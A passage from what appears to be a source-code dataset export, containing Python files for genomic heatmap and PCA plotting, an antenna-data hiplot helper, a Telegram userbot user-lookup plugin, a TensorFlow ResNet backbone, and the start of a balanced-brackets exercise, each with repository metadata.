xticklabels=True, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 + 1.5 - len(group)/2, 1.2, group, size=30)
re.savefig(name + "." + args.save)
else:
re.savefig(name + "_col_cluster." + args.save)
plt.close()
def make_col_color_heatmap(group_dic, args=None):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
if args.ac and args.bc:
color[group1] = args.ac
color[group2] = args.bc
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None, args=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = {}
colors1 = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
colors[name] = colors1[i]
i += 1
if args.ac and args.bc:
colors[group1] = args.ac
colors[group2] = args.bc
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[name])
plt.title("PCA analysis", size=20)
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1, size=15)
plt.ylabel("PC1(%.1f)" % pc2, size=15)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group, args=None):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
names = []
if which == "cnv":
how = "mean"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
else:
how = "sum"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
z, p = ranksums(box_data[names[0]], box_data[names[1]])
if p >= 0.05:
plt.close()
return
data.to_csv(outname + "_box_data_%s" % (regulation) + ".txt", sep="\t")
if args.ac and args.bc:
group1 = list(group.keys())[0]
group2 = list(group.keys())[1]
palette[group1] = args.ac
palette[group2] = args.bc
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title("Difference of %s (p = %f)" % (which, p), size=30)
ax1.set_ylabel('%s value' % (which), size=30)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=0, size=30)
plt.legend()
fig.savefig(r'%s_box_data_%s_%s_Boxplot.%s' % (outname, regulation, how, args.save), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None, args=None):
palette_up = {}; palette_down = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]; group1 = list(group.keys())[0]
group2_data = raw[list(group.values())[1]]; group2 = list(group.keys())[1]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene); palette_up[group1] = "red"; palette_up[group2] = "blue"
else:
down.append(gene); palette_down[group1] = "blue"; palette_down[group2] = "red"
if len(palette_up) > 0:
for i in up:
plot_box(raw.ix[i], which, i, palette_up, "up", group, args=args)
if len(palette_down) > 0:
for i in down:
plot_box(raw.ix[i], which, i, palette_down, "down", group, args=args)
def save_data_pdf(data, name, length, color, group_dic, which, args=None):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
try:
pheatmap(data, length, col_cluster=True, color=color, name=name, args=args)
pheatmap(data, length, col_cluster=False, color=color, name=name, args=args)
except MemoryError:
print("you gene need too much MemoryError and i, so pass and do next")
pca(data, group_dic, n=name, args=args)
databox(data, which, outname=name, group=group_dic, args=args)
def save_parameters(args=None):
f = open("parameters.txt", "w")
for arg in dir(args):
if not arg.startswith("_"):
f.write(arg + ": " + str(getattr(args, arg)) + "\n")
f.close()
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
# for two_group in itertools.combinations([args.group1, args.group2], 2):
two_group = [args.group1[0].split("/")[-2], args.group2[0].split("/")[-2]]
target = args.group1[0].split("/")[-2] + "_VS_" + args.group2[0].split("/")[-2] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args=args)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args=args)
# feature_gene = feature_select(gene_list, a_group, b_group, pval=args.pval, method=args.feature_selection_method,\
# criterion=args.criterion, penalty=args.penalty, C=args.C, threshold=args.threshold)
feature_gene = feature_select(gene_list, a_group, b_group, args=args)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic, args=args)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which, args=args)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, args=args)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which, args=args)
os.chdir(args.outdir)
# if len(args.group1 + args.group2) > 2:
# try:
# os.mkdir("intersection")
# except FileExistsError:
# pass
# os.chdir("intersection")
# color, length = make_col_color_heatmap(color_length)
# intersection_feature_gene = list(set(feature_genes[0]).intersection(*feature_genes[1:]))
# intersection_feature_gene_cnv = pd.concat([data.ix[intersection_feature_gene] for [args.group1, args.group2], data in gene_lists.items()], axis=1)
# try:
# save_data_pdf(intersection_feature_gene_cnv, "intersection", length, color, color_length)
# except Exception:
# print("no intersection\njob finish...")
# os.chdir(args.outdir)
| 39.23431
| 156
| 0.630266
|
ools
import seaborn as sns
import matplotlib.pylab as plt
import matplotlib.colors as mc
from genecast_package.svm_analysis import feature_select, evaluate_model
from sklearn.decomposition import PCA
from collections import OrderedDict
from collections import defaultdict
import datetime
import pandas as pd
from scipy.stats import ranksums
import os
import sh
import warnings
warnings.filterwarnings("ignore")
def z_score(data, axis):
if axis == 3:
return data
if axis == 1:
z_scored = data
else:
z_scored = data.T
z_scored = (z_scored - z_scored.mean()) / z_scored.std()
if axis == 1:
return z_scored
else:
return z_scored.T
def pheatmap(data, length, col_cluster=True, xticklabels=True, yticklabels=True, color=None, name=None, args=None):
data = z_score(data, axis=args.z_score)
if len(data.columns) > 30:
xticklabels = False
if len(data) > 80:
yticklabels = False
vmin, vmax = data.unstack().quantile([.05, .95])
if args.z_score == 3:
vmin, vmax = 0, 4
re = sns.clustermap(data, cmap=args.cmp, row_cluster=True, method=args.cluster_method, col_cluster=col_cluster, figsize=(13, 10), \
xticklabels=True, yticklabels=yticklabels, vmin=vmin, vmax=vmax, col_colors=color)
re.ax_heatmap.set_xticklabels(re.ax_heatmap.xaxis.get_majorticklabels(), rotation=90)
re.ax_heatmap.set_yticklabels(re.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)
if col_cluster == False:
for group, number in length.items():
re.ax_col_colors.text((number[0] + number[1])/2 + 1.5 - len(group)/2, 1.2, group, size=30)
re.savefig(name + "." + args.save)
else:
re.savefig(name + "_col_cluster." + args.save)
plt.close()
def make_col_color_heatmap(group_dic, args=None):
common_color = ["blue", "red", "green", "grey"]
color = {}; length = {}
temp = 0
i = 0
for name, group in group_dic.items():
length[name] = [temp, temp + len(group)]
temp += len(group)
for sample in group:
color[sample] = common_color[i]
i += 1
if args.ac and args.bc:
color[group1] = args.ac
color[group2] = args.bc
color = pd.Series(color)
color.name = "group"
return color, length
def pca(data, group_dic, n=None, args=None):
pca = PCA(n_components=2)
group = []
length = OrderedDict()
temp = 0
for name, g in group_dic.items():
length[name] = [temp, temp + len(g)]
temp += len(g)
group += g
data = data[group]
newData = pca.fit_transform(data.T)
colors = {}
colors1 = ["blue", "red", "green", 'turquoise', "grey"]
i = 0
for name, number in length.items():
colors[name] = colors1[i]
i += 1
if args.ac and args.bc:
colors[group1] = args.ac
colors[group2] = args.bc
for name, number in length.items():
plt.scatter(newData[number[0]:number[1], 0], newData[number[0]:number[1], 1], label=name, color=colors[name])
plt.title("PCA analysis", size=20)
pc1 = 100*pca.explained_variance_ratio_[0]
pc2 = 100*pca.explained_variance_ratio_[1]
plt.xlabel("PC1(%.1f)" % pc1, size=15)
plt.ylabel("PC1(%.1f)" % pc2, size=15)
plt.legend()
plt.savefig("PCA_%s.png" % n)
plt.close()
def plot_box(data, which, outname, palette, regulation, group, args=None):
fig, ax1 = plt.subplots(figsize=(8,12))
box_data = defaultdict(list)
names = []
if which == "cnv":
how = "mean"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
else:
how = "sum"
for name, g in group.items():
names.append(name)
box_data[name] = data[g]
z, p = ranksums(box_data[names[0]], box_data[names[1]])
if p >= 0.05:
plt.close()
return
data.to_csv(outname + "_box_data_%s" % (regulation) + ".txt", sep="\t")
if args.ac and args.bc:
group1 = list(group.keys())[0]
group2 = list(group.keys())[1]
palette[group1] = args.ac
palette[group2] = args.bc
sns.boxplot(data=pd.DataFrame(box_data), ax=ax1, width=0.2, linewidth=.5, palette=palette)
ax1.set_title("Difference of %s (p = %f)" % (which, p), size=30)
ax1.set_ylabel('%s value' % (which), size=30)
fig.autofmt_xdate(ha='center', rotation=0)
plt.xticks(rotation=0, size=30)
plt.legend()
fig.savefig(r'%s_box_data_%s_%s_Boxplot.%s' % (outname, regulation, how, args.save), dpi=600, size=0.5)
plt.close()
def databox(raw, which, outname=None, group=None, args=None):
palette_up = {}; palette_down = {}
up = []; down = []
group1_data = raw[list(group.values())[0]]; group1 = list(group.keys())[0]
group2_data = raw[list(group.values())[1]]; group2 = list(group.keys())[1]
for gene in raw.index:
if group1_data.ix[gene].sum() - group2_data.ix[gene].sum() >= 0:
up.append(gene); palette_up[group1] = "red"; palette_up[group2] = "blue"
else:
down.append(gene); palette_down[group1] = "blue"; palette_down[group2] = "red"
if len(palette_up) > 0:
for i in up:
plot_box(raw.ix[i], which, i, palette_up, "up", group, args=args)
if len(palette_down) > 0:
for i in down:
plot_box(raw.ix[i], which, i, palette_down, "down", group, args=args)
def save_data_pdf(data, name, length, color, group_dic, which, args=None):
data.to_csv("%s.txt" % name, sep="\t")
length = {key.split("/")[-1]: value for key, value in length.items()}
group_dic = {key.split("/")[-1]: value for key, value in group_dic.items()}
try:
pheatmap(data, length, col_cluster=True, color=color, name=name, args=args)
pheatmap(data, length, col_cluster=False, color=color, name=name, args=args)
except MemoryError:
print("you gene need too much MemoryError and i, so pass and do next")
pca(data, group_dic, n=name, args=args)
databox(data, which, outname=name, group=group_dic, args=args)
def save_parameters(args=None):
f = open("parameters.txt", "w")
for arg in dir(args):
if not arg.startswith("_"):
f.write(arg + ": " + str(getattr(args, arg)) + "\n")
f.close()
def make_result_folder(args=None, which="cnv", fun=None):
feature_genes = []; gene_lists = {}; color_length = {}
os.chdir(args.outdir)
i = datetime.datetime.now()
two_group = [args.group1[0].split("/")[-2], args.group2[0].split("/")[-2]]
target = args.group1[0].split("/")[-2] + "_VS_" + args.group2[0].split("/")[-2] + "_%s%s%s_%s%s" % (i.year, i.month, i.day, i.hour, i.minute)
try:
os.mkdir(target)
except FileExistsError:
sh.rm("-rf",target)
os.mkdir(target)
if which == "cnv":
name = "cnv_median_" + args.data_type
gene_list, a_group, b_group = fun(args=args)
else:
if args.cal_type == "num":
name = "snv_number"
else:
name = "snv_mean"
gene_list, a_group, b_group = fun(args=args)
feature_gene = feature_select(gene_list, a_group, b_group, args=args)
feature_genes.append(feature_gene)
gene_lists[two_group[0]] = gene_list[a_group]; gene_lists[two_group[1]] = gene_list[b_group]
os.chdir(target)
save_parameters(args=args)
group_dic = {two_group[0]: a_group, two_group[1]: b_group}
color_length[two_group[0]] = a_group; color_length[two_group[1]] = b_group
color, length = make_col_color_heatmap(group_dic, args=args)
save_data_pdf(gene_list, "host_gene_%s" % name, length, color, group_dic, which, args=args)
pd.DataFrame({"gene":feature_gene}).to_csv("feature_gene_pval%0.2f.txt" % args.pval, sep="\t", index=False)
feature_gene_cnv = gene_list.ix[feature_gene]
evaluate_model(gene_list, a_group, b_group, feature_gene, name="feature_gene_%s" % name, args=args)
save_data_pdf(feature_gene_cnv, "feature_gene_%s" % name, length, color, group_dic, which, args=args)
os.chdir(args.outdir)
| true
| true
|
790b0587c2415c64ec38f584c0c79b320ea5c5f0
| 500
|
py
|
Python
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 2
|
2021-08-12T18:18:11.000Z
|
2021-12-02T07:58:51.000Z
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 1
|
2021-12-15T18:51:14.000Z
|
2021-12-15T18:51:14.000Z
|
mnc/lwa_hiplot.py
|
jaycedowell/mnc_python
|
bc378ccc9a6cfaf76691122f072366b13e6ef092
|
[
"BSD-3-Clause"
] | 1
|
2021-12-03T15:05:00.000Z
|
2021-12-03T15:05:00.000Z
|
import hiplot
import lwa_antpos
def get_exp(uri):
df = lwa_antpos.lwa_df.reset_index()
df.drop(0, inplace=True) # remove antnum=0
df.antname = df.antname.apply(lambda x: int(x.split('-')[1]))
df.rename(columns={'antname': 'antnum'}, inplace=True)
df = df[['antnum', 'pola_fee', 'polb_fee', 'arx_address', 'pola_arx_channel', 'polb_arx_channel', 'snap2_hostname',
'pola_digitizer_channel', 'polb_digitizer_channel']]
return hiplot.Experiment.from_dataframe(df)
| 38.461538
| 119
| 0.69
|
import hiplot
import lwa_antpos
def get_exp(uri):
df = lwa_antpos.lwa_df.reset_index()
df.drop(0, inplace=True)
df.antname = df.antname.apply(lambda x: int(x.split('-')[1]))
df.rename(columns={'antname': 'antnum'}, inplace=True)
df = df[['antnum', 'pola_fee', 'polb_fee', 'arx_address', 'pola_arx_channel', 'polb_arx_channel', 'snap2_hostname',
'pola_digitizer_channel', 'polb_digitizer_channel']]
return hiplot.Experiment.from_dataframe(df)
| true
| true
|
790b05ca0e0c618bfe1b0827b220b95931031312
| 1,092
|
py
|
Python
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 7
|
2020-05-28T04:08:02.000Z
|
2022-02-22T18:11:03.000Z
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 1
|
2021-07-28T10:12:25.000Z
|
2021-12-13T15:09:43.000Z
|
plugins/user.py
|
fosslife/grambot
|
fbec1a8df939823b18915d4689e9da6f5adb871b
|
[
"MIT"
] | 4
|
2020-03-30T18:27:08.000Z
|
2022-02-25T16:28:06.000Z
|
from userbot import bot, logger
from telethon import TelegramClient, events
from config import user
from telethon.tl.functions.users import GetFullUserRequest
@bot.on(events.NewMessage(**user))
async def getUser(event):
logger.info("user plugin is called")
pattern_string = event.pattern_match.string
entity = pattern_string[pattern_string.find("(")+1:pattern_string.find(")")]
logger.info(f"entity to search - {entity}")
try:
info = await bot(GetFullUserRequest(entity))
await event.respond(f"""
Username - `{info.user.username}`
{"User is a bot" if info.user.bot else "user is not a bot"}
{"User is restricted for " + info.user.restriction_reason if info.user.restricted else "User is not restricted"}
Name - {info.user.first_name} {info.user.last_name if info.user.last_name else ""}
Status - `{info.about}`
id - {info.user.id}
{info.common_chats_count} groups common with me
{"I have blocked this user" if info.blocked else "I have not blocked this user"}
""")
except Exception:
await event.respond(f"Cannot find entity with `{entity}`")
| 42
| 113
| 0.725275
|
from userbot import bot, logger
from telethon import TelegramClient, events
from config import user
from telethon.tl.functions.users import GetFullUserRequest
@bot.on(events.NewMessage(**user))
async def getUser(event):
logger.info("user plugin is called")
pattern_string = event.pattern_match.string
entity = pattern_string[pattern_string.find("(")+1:pattern_string.find(")")]
logger.info(f"entity to search - {entity}")
try:
info = await bot(GetFullUserRequest(entity))
await event.respond(f"""
Username - `{info.user.username}`
{"User is a bot" if info.user.bot else "user is not a bot"}
{"User is restricted for " + info.user.restriction_reason if info.user.restricted else "User is not restricted"}
Name - {info.user.first_name} {info.user.last_name if info.user.last_name else ""}
Status - `{info.about}`
id - {info.user.id}
{info.common_chats_count} groups common with me
{"I have blocked this user" if info.blocked else "I have not blocked this user"}
""")
except Exception:
await event.respond(f"Cannot find entity with `{entity}`")
| true
| true
|
790b0642bc651ce6634c07feaef088b93a3e0de0
| 9,643
|
py
|
Python
|
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
models/official/detection/modeling/architecture/resnet.py
|
hoangphucITJP/tpu
|
e4ce0d8eb61a828d4b5fe09effd082356e88545c
|
[
"Apache-2.0"
] | null | null | null |
# Lint as: python2, python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains definitions for the post-activation form of Residual Networks.
Residual networks (ResNets) were proposed in:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Deep Residual Learning for Image Recognition. arXiv:1512.03385
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range
import tensorflow.compat.v1 as tf
from modeling.architecture import nn_blocks
from modeling.architecture import nn_ops
def get_drop_connect_rate(init_rate, block_num, total_blocks):
"""Get drop connect rate for the ith block."""
if init_rate is not None:
return init_rate * float(block_num) / total_blocks
else:
return None
def block_group(inputs,
filters,
strides,
use_projection,
block_fn,
block_repeats,
batch_norm_relu=nn_ops.BatchNormRelu(),
dropblock=nn_ops.Dropblock(),
drop_connect_rate=None,
data_format='channels_last',
name=None,
is_training=False):
"""Builds one group of blocks.
Args:
inputs: a `Tensor` of size `[batch, channels, height, width]`.
filters: an `int` number of filters for the first two convolutions.
strides: an `int` block stride. If greater than 1, this block will
ultimately downsample the input.
use_projection: a `bool` for whether this block should use a projection
shortcut (versus the default identity shortcut). This is usually `True`
for the first block of a block group, which may change the number of
filters and the resolution.
block_fn: the `function` for the block to use within the model
block_repeats: an `int` number of blocks to repeat in the group.
batch_norm_relu: an operation that is added after convolutions, including a
batch norm layer and an optional relu activation.
dropblock: a drop block layer that is added after convluations. Note that
the default implementation does not apply any drop block.
drop_connect_rate: a 'float' number that specifies the drop connection rate
of the block. Note that the default `None` means no drop connection is
applied.
data_format: a `str` that specifies the data format.
name: a `str` name for the Tensor output of the block layer.
is_training: a `bool` if True, the model is in training mode.
Returns:
The output `Tensor` of the block layer.
"""
# Only the first block per block_group uses projection shortcut and strides.
inputs = block_fn(
inputs,
filters,
strides,
use_projection=use_projection,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
for _ in range(1, block_repeats):
inputs = block_fn(
inputs,
filters,
1,
use_projection=False,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
return tf.identity(inputs, name)
class Resnet(object):
"""Class to build ResNet family model."""
def __init__(self,
resnet_depth,
dropblock=nn_ops.Dropblock(),
batch_norm_relu=nn_ops.BatchNormRelu(),
init_drop_connect_rate=None,
data_format='channels_last'):
"""ResNet initialization function.
Args:
resnet_depth: `int` depth of ResNet backbone model.
dropblock: a dropblock layer.
batch_norm_relu: an operation that includes a batch normalization layer
followed by a relu layer(optional).
init_drop_connect_rate: a 'float' number that specifies the initial drop
connection rate. Note that the default `None` means no drop connection
is applied.
data_format: `str` either "channels_first" for `[batch, channels, height,
width]` or "channels_last for `[batch, height, width, channels]`.
"""
self._resnet_depth = resnet_depth
self._dropblock = dropblock
self._batch_norm_relu = batch_norm_relu
self._init_drop_connect_rate = init_drop_connect_rate
self._data_format = data_format
model_params = {
10: {'block': nn_blocks.residual_block, 'layers': [1, 1, 1, 1]},
18: {'block': nn_blocks.residual_block, 'layers': [2, 2, 2, 2]},
34: {'block': nn_blocks.residual_block, 'layers': [3, 4, 6, 3]},
50: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 6, 3]},
101: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 23, 3]},
152: {'block': nn_blocks.bottleneck_block, 'layers': [3, 8, 36, 3]},
200: {'block': nn_blocks.bottleneck_block, 'layers': [3, 24, 36, 3]}
}
if resnet_depth not in model_params:
valid_resnet_depths = ', '.join(
[str(depth) for depth in sorted(model_params.keys())])
raise ValueError(
'The resnet_depth should be in [%s]. Not a valid resnet_depth:'%(
valid_resnet_depths), self._resnet_depth)
params = model_params[resnet_depth]
self._resnet_fn = self.resnet_v1_generator(
params['block'], params['layers'])
def __call__(self, inputs, is_training=False):
"""Returns the ResNet model for a given size and number of output classes.
Args:
inputs: a `Tesnor` with shape [batch_size, height, width, 3] representing
a batch of images.
is_training: `bool` if True, the model is in training mode.
Returns:
a `dict` containing `int` keys for continuous feature levels [2, 3, 4, 5].
The values are corresponding feature hierarchy in ResNet with shape
[batch_size, height_l, width_l, num_filters].
"""
with tf.variable_scope('resnet%s' % self._resnet_depth):
return self._resnet_fn(inputs, is_training)
def resnet_v1_generator(self, block_fn, layers):
"""Generator for ResNet v1 models.
Args:
block_fn: `function` for the block to use within the model. Either
`residual_block` or `bottleneck_block`.
layers: list of 4 `int`s denoting the number of blocks to include in each
of the 4 block groups. Each group consists of blocks that take inputs of
the same resolution.
Returns:
Model `function` that takes in `inputs` and `is_training` and returns the
output `Tensor` of the ResNet model.
"""
def model(inputs, is_training=False):
"""Creation of the model graph."""
inputs = nn_ops.conv2d_fixed_padding(
inputs=inputs, filters=64, kernel_size=7, strides=2,
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_conv')
inputs = self._batch_norm_relu(inputs, is_training=is_training)
inputs = tf.layers.max_pooling2d(
inputs=inputs, pool_size=3, strides=2, padding='SAME',
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_max_pool')
c2 = block_group(
inputs=inputs,
filters=64,
strides=1,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[0],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 2, 5),
name='block_group1',
is_training=is_training)
c3 = block_group(
inputs=c2,
filters=128,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[1],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 3, 5),
name='block_group2',
is_training=is_training)
c4 = block_group(
inputs=c3,
filters=256,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[2],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 4, 5),
name='block_group3',
is_training=is_training)
c5 = block_group(
inputs=c4,
filters=512,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[3],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 5, 5),
name='block_group4',
is_training=is_training)
return {2: c2, 3: c3, 4: c4, 5: c5}
return model
| 37.964567
| 80
| 0.657057
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import range
import tensorflow.compat.v1 as tf
from modeling.architecture import nn_blocks
from modeling.architecture import nn_ops
def get_drop_connect_rate(init_rate, block_num, total_blocks):
if init_rate is not None:
return init_rate * float(block_num) / total_blocks
else:
return None
def block_group(inputs,
filters,
strides,
use_projection,
block_fn,
block_repeats,
batch_norm_relu=nn_ops.BatchNormRelu(),
dropblock=nn_ops.Dropblock(),
drop_connect_rate=None,
data_format='channels_last',
name=None,
is_training=False):
inputs = block_fn(
inputs,
filters,
strides,
use_projection=use_projection,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
for _ in range(1, block_repeats):
inputs = block_fn(
inputs,
filters,
1,
use_projection=False,
batch_norm_relu=batch_norm_relu,
dropblock=dropblock,
drop_connect_rate=drop_connect_rate,
data_format=data_format,
is_training=is_training)
return tf.identity(inputs, name)
class Resnet(object):
def __init__(self,
resnet_depth,
dropblock=nn_ops.Dropblock(),
batch_norm_relu=nn_ops.BatchNormRelu(),
init_drop_connect_rate=None,
data_format='channels_last'):
self._resnet_depth = resnet_depth
self._dropblock = dropblock
self._batch_norm_relu = batch_norm_relu
self._init_drop_connect_rate = init_drop_connect_rate
self._data_format = data_format
model_params = {
10: {'block': nn_blocks.residual_block, 'layers': [1, 1, 1, 1]},
18: {'block': nn_blocks.residual_block, 'layers': [2, 2, 2, 2]},
34: {'block': nn_blocks.residual_block, 'layers': [3, 4, 6, 3]},
50: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 6, 3]},
101: {'block': nn_blocks.bottleneck_block, 'layers': [3, 4, 23, 3]},
152: {'block': nn_blocks.bottleneck_block, 'layers': [3, 8, 36, 3]},
200: {'block': nn_blocks.bottleneck_block, 'layers': [3, 24, 36, 3]}
}
if resnet_depth not in model_params:
valid_resnet_depths = ', '.join(
[str(depth) for depth in sorted(model_params.keys())])
raise ValueError(
'The resnet_depth should be in [%s]. Not a valid resnet_depth:'%(
valid_resnet_depths), self._resnet_depth)
params = model_params[resnet_depth]
self._resnet_fn = self.resnet_v1_generator(
params['block'], params['layers'])
def __call__(self, inputs, is_training=False):
with tf.variable_scope('resnet%s' % self._resnet_depth):
return self._resnet_fn(inputs, is_training)
def resnet_v1_generator(self, block_fn, layers):
def model(inputs, is_training=False):
inputs = nn_ops.conv2d_fixed_padding(
inputs=inputs, filters=64, kernel_size=7, strides=2,
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_conv')
inputs = self._batch_norm_relu(inputs, is_training=is_training)
inputs = tf.layers.max_pooling2d(
inputs=inputs, pool_size=3, strides=2, padding='SAME',
data_format=self._data_format)
inputs = tf.identity(inputs, 'initial_max_pool')
c2 = block_group(
inputs=inputs,
filters=64,
strides=1,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[0],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 2, 5),
name='block_group1',
is_training=is_training)
c3 = block_group(
inputs=c2,
filters=128,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[1],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 3, 5),
name='block_group2',
is_training=is_training)
c4 = block_group(
inputs=c3,
filters=256,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[2],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 4, 5),
name='block_group3',
is_training=is_training)
c5 = block_group(
inputs=c4,
filters=512,
strides=2,
use_projection=True,
block_fn=block_fn,
block_repeats=layers[3],
batch_norm_relu=self._batch_norm_relu,
dropblock=self._dropblock,
drop_connect_rate=get_drop_connect_rate(
self._init_drop_connect_rate, 5, 5),
name='block_group4',
is_training=is_training)
return {2: c2, 3: c3, 4: c4, 5: c5}
return model
| true
| true
|
790b0695b94723e79b7c0b1171676002fd6a3093
| 1,310
|
py
|
Python
|
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | 2
|
2020-05-28T07:15:00.000Z
|
2020-07-21T08:34:06.000Z
|
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
Data Structures/Stack/Balanced Bracket/balanced_bracket.py
|
brianchiang-tw/HackerRank
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isBalanced function below.
def isBalanced(s):
left_symbol = [ '{', '[', '(']
right_symbol = [ '}', ']', ')']
# fast checking of symbol counting equality
for i in range(3):
left_count = s.count( left_symbol[i] )
right_count = s.count( right_symbol[i] )
if left_count != right_count:
return "NO"
_stack = []
